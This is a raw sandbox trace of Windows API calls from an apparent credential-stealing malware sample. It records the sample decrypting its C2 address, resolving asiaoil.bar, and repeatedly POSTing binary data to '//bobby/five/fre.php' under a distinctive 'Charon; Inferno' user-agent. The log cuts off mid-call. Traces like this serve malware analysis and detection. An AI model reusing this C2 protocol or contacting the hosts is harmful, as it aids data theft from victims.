0x77b10000 [0296.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d320) returned 1 [0296.401] GetProcessHeap () returned 0x740000 [0296.401] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584d8 [0296.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.402] CryptImportKey (in: hProv=0x75d320, pbData=0x7584d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d3a8) returned 1 [0296.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.403] CryptSetKeyParam (hKey=0x74d3a8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.404] CryptSetKeyParam (hKey=0x74d3a8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.404] GetProcessHeap () returned 0x740000 [0296.405] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584d8 | out: hHeap=0x740000) returned 1 [0296.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.406] CryptDecrypt (in: hKey=0x74d3a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0296.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.406] CryptDestroyKey (hKey=0x74d3a8) returned 1 [0296.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.557] CryptReleaseContext (hProv=0x75d320, dwFlags=0x0) returned 1 [0296.557] GetProcessHeap () returned 0x740000 [0296.557] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0296.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.558] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.559] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.560] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.561] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.561] GetProcessHeap () returned 0x740000 [0296.561] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be18 [0296.561] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.689] GetProcessHeap () returned 0x740000 [0296.689] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be18 | out: hHeap=0x740000) returned 1 [0296.689] GetProcessHeap () returned 0x740000 [0296.689] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0296.690] GetProcessHeap () returned 0x740000 [0296.690] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0296.690] GetProcessHeap () returned 0x740000 [0296.690] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0296.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.691] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75ccc0) returned 1 [0296.812] GetProcessHeap () returned 0x740000 [0296.812] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0296.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.813] CryptImportKey (in: hProv=0x75ccc0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0296.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.814] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.815] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.815] GetProcessHeap () returned 0x740000 [0296.816] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0296.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.817] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0296.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.818] CryptDestroyKey (hKey=0x74d768) returned 1 [0296.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.819] CryptReleaseContext (hProv=0x75ccc0, dwFlags=0x0) returned 1 [0296.819] GetProcessHeap () returned 0x740000 [0296.819] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0296.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.820] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0296.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.821] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0296.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.822] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0296.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.823] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0296.823] GetProcessHeap () returned 0x740000 [0296.823] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdf0 [0296.823] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0296.824] GetProcessHeap () returned 0x740000 [0296.824] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0296.824] socket (af=2, type=1, protocol=6) returned 0x28c [0296.825] connect (s=0x28c, name=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0297.323] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0297.323] GetProcessHeap () returned 0x740000 [0297.323] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cdd0 [0297.323] GetProcessHeap () returned 0x740000 [0297.323] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0297.324] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0297.325] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0297.325] GetProcessHeap () returned 0x740000 [0297.325] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x7562c0 [0297.325] GetProcessHeap () returned 0x740000 [0297.325] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0297.326] GetProcessHeap () returned 0x740000 [0297.326] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763e00 [0297.326] GetProcessHeap () returned 0x740000 [0297.326] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0297.326] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0297.327] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0297.327] GetProcessHeap () returned 0x740000 [0297.327] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747868 [0297.327] GetProcessHeap () returned 0x740000 [0297.343] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0297.343] send (s=0x28c, buf=0x747868*, len=243, flags=0) returned 243 [0297.344] send (s=0x28c, buf=0x761fd0*, len=159, flags=0) returned 159 [0297.344] GetProcessHeap () returned 0x740000 [0297.344] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x75da80 [0297.344] recv (in: s=0x28c, buf=0x75da80, len=4048, flags=0 | out: buf=0x75da80*) returned 571 [0297.477] GetProcessHeap () returned 0x740000 [0297.478] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0297.479] GetProcessHeap () returned 0x740000 [0297.479] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763e00 | out: hHeap=0x740000) returned 1 [0297.479] GetProcessHeap () returned 0x740000 [0297.480] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562c0 | out: hHeap=0x740000) returned 1 [0297.480] GetProcessHeap () returned 0x740000 [0297.480] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cdd0 | out: hHeap=0x740000) returned 1 [0297.480] closesocket (s=0x28c) returned 0 [0297.480] GetProcessHeap () returned 0x740000 [0297.480] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0297.480] GetProcessHeap () returned 0x740000 [0297.481] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0297.481] GetProcessHeap () returned 0x740000 [0297.481] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0297.481] GetProcessHeap () returned 0x740000 [0297.482] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0297.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x75da80, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1030) returned 0x28c [0297.483] Sleep (dwMilliseconds=0xea60) [0297.485] GetProcessHeap () returned 0x740000 [0297.485] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0297.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.517] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75ce58) returned 1 [0297.618] GetProcessHeap () returned 0x740000 [0297.618] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0297.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.619] CryptImportKey (in: hProv=0x75ce58, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0297.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.816] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.817] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.817] GetProcessHeap () returned 0x740000 [0297.817] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0297.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.818] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0297.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.819] CryptDestroyKey (hKey=0x74d768) returned 1 [0297.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.821] CryptReleaseContext (hProv=0x75ce58, dwFlags=0x0) returned 1 [0297.821] GetProcessHeap () returned 0x740000 [0297.821] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0297.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0297.822] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0297.823] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0297.824] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0297.964] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.964] GetProcessHeap () returned 0x740000 [0297.964] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0297.964] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.965] GetProcessHeap () returned 0x740000 [0297.965] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0297.965] GetProcessHeap () returned 0x740000 [0297.966] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0297.966] GetProcessHeap () returned 0x740000 [0297.966] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0297.966] GetProcessHeap () returned 0x740000 [0297.966] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763db8 [0297.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.969] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cdd0) returned 1 [0297.983] GetProcessHeap () returned 0x740000 [0297.983] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0297.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.984] CryptImportKey (in: hProv=0x75cdd0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0297.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.985] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.986] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.986] GetProcessHeap () returned 0x740000 [0297.987] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0297.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.989] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763db8, pdwDataLen=0x19fcfc | out: pbData=0x763db8, pdwDataLen=0x19fcfc) returned 1 [0297.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.992] CryptDestroyKey (hKey=0x74d768) returned 1 [0297.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0297.994] CryptReleaseContext (hProv=0x75cdd0, dwFlags=0x0) returned 1 [0297.994] GetProcessHeap () returned 0x740000 [0297.994] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0298.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0298.040] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0298.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0298.167] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0298.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0298.168] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0298.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0298.169] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0298.170] GetProcessHeap () returned 0x740000 [0298.170] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be68 [0298.170] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0298.397] GetProcessHeap () returned 0x740000 [0298.397] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0298.397] socket (af=2, type=1, protocol=6) returned 0x298 [0298.397] connect (s=0x298, name=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0298.578] FreeAddrInfoW (pAddrInfo=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0298.578] GetProcessHeap () returned 0x740000 [0298.578] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0298.578] GetProcessHeap () returned 0x740000 [0298.578] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0298.579] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0298.580] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0298.580] GetProcessHeap () returned 0x740000 [0298.580] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0298.580] GetProcessHeap () returned 0x740000 [0298.581] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0298.581] GetProcessHeap () returned 0x740000 [0298.581] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0298.581] GetProcessHeap () returned 0x740000 [0298.581] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0298.581] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0298.582] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0298.582] GetProcessHeap () returned 0x740000 [0298.582] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0298.582] GetProcessHeap () returned 0x740000 [0298.583] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0298.583] send (s=0x298, buf=0x747928*, len=243, flags=0) returned 243 [0298.583] send (s=0x298, buf=0x761fd0*, len=159, flags=0) returned 159 [0298.583] GetProcessHeap () returned 0x740000 [0298.584] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0298.584] recv (in: s=0x298, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 571 [0298.707] GetProcessHeap () returned 0x740000 [0298.707] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0298.707] GetProcessHeap () returned 0x740000 [0298.707] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0298.707] GetProcessHeap () returned 0x740000 [0298.707] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0298.708] GetProcessHeap () returned 0x740000 [0298.708] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0298.708] closesocket (s=0x298) returned 0 [0298.709] GetProcessHeap () returned 0x740000 [0298.709] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0298.709] GetProcessHeap () returned 0x740000 [0298.709] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0298.709] GetProcessHeap () returned 0x740000 [0298.709] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763db8 | out: hHeap=0x740000) returned 1 [0298.709] GetProcessHeap () returned 0x740000 [0298.709] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be68 | out: hHeap=0x740000) returned 1 [0298.710] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1038) returned 0x298 [0298.713] Sleep (dwMilliseconds=0xea60) [0298.714] GetProcessHeap () returned 0x740000 [0298.714] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0298.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0298.716] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0298.977] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0299.163] GetProcessHeap () returned 0x740000 [0299.163] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0299.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.164] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: 